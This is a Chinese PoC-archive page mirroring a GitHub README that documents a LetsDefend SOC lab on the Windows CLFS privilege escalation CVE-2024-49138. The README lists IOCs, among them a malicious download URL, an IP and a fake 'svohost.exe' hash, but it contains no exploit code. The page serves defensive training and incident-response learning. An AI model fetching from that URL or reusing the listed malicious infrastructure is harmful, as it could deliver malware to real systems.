目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2024-49138 PoC — Microsoft Windows Common Log File System Driver 安全漏洞

来源
https://github.com/CyprianAtsyor/letsdefend-cve-2024-49138-investigation
关联漏洞
标题:Microsoft Windows Common Log File System Driver 安全漏洞 (CVE-2024-49138)
Description:Microsoft Windows Common Log File System Driver是美国微软(Microsoft)公司的通用日志文件系统 (CLFS) API 提供了一个高性能、通用的日志文件子系统,专用客户端应用程序可以使用该子系统并且多个客户端可以共享以优化日志访问。 Microsoft Windows Common Log File System Driver存在安全漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows Server 2008 R2 for x64-
Description
Hands-on SOC investigation of CVE-2024-49138 using LetsDefend, VirusTotal, Hybrid Analysis, TrueFort, and ChatGPT.
介绍
# LetsDefend Investigation: CVE-2024-49138

## 🔍 Overview

Hands-on SOC investigation and incident response simulation using [LetsDefend](https://letsdefend.io/), focused on a real-world exploitation of **CVE-2024-49138** — a privilege escalation vulnerability in Windows CLFS driver.

## 📅 Event Details

- **Event ID**: 313
- **Incident Type**: Privilege Escalation
- **Event Time**: Jan 22, 2025
- **Hostname**: Victor
- **IP Address**: 172.16.17.207
- **Malicious Binary**: `svohost.exe`
- **Parent Process**: `powershell.exe`
- **Suspicious Command**: `\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`

## 🛠️ Tools Used

- [VirusTotal](https://virustotal.com)
- [Hybrid Analysis](https://www.hybrid-analysis.com)
- [TrueFort](https://www.truefort.com)
- [ChatGPT](https://chat.openai.com) — For decoding PowerShell commands and analyzing behavior
- LetsDefend Lab Environment

## 🧠 Indicators of Compromise

- **Hash**: `b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9`
- **Malicious URL**: `https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip`
- **Malicious IP**: `185.107.56.141`

## 🧩 Key Takeaways

- Identified fake system binary (`svohost.exe`) used for privilege escalation.
- Mapped activity to MITRE ATT&CK techniques.
- Used a layered toolset for full visibility (EDR, sandboxing, static/dynamic analysis, AI).
- Gained insight into PowerShell-based malware delivery methods.

## 🏁 Outcome

Successfully triaged, investigated, and documented the attack chain leveraging CVE-2024-49138. This lab helped reinforce my skills in incident response, behavioral analysis, and threat detection.

## 🔎 Investigation Screenshots

### Alert Triggered in LetsDefend
![Alert Screenshot](/Alert-Panel.png)

### VirusTotal Result for Malicious Hash
![VirusTotal](/VirusTotal.png)

### 🔬 Process Tree Analysis
![Process Analysis](/Process.png)

### 🧪 PowerShell & AbuseIPDB Usage
![AbuseIPDB](/AbuseIPDB.png)

### 📋 Incident Notes
![Notes](/Note.png)

### 🪟 Windows Artifacts
![Microsoft Artifact](/Microsoft.png)

### ✅ Final Wrap-up / Task Marked
![Final](/Mark.png)


---

> “Getting 1% better every day.”
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →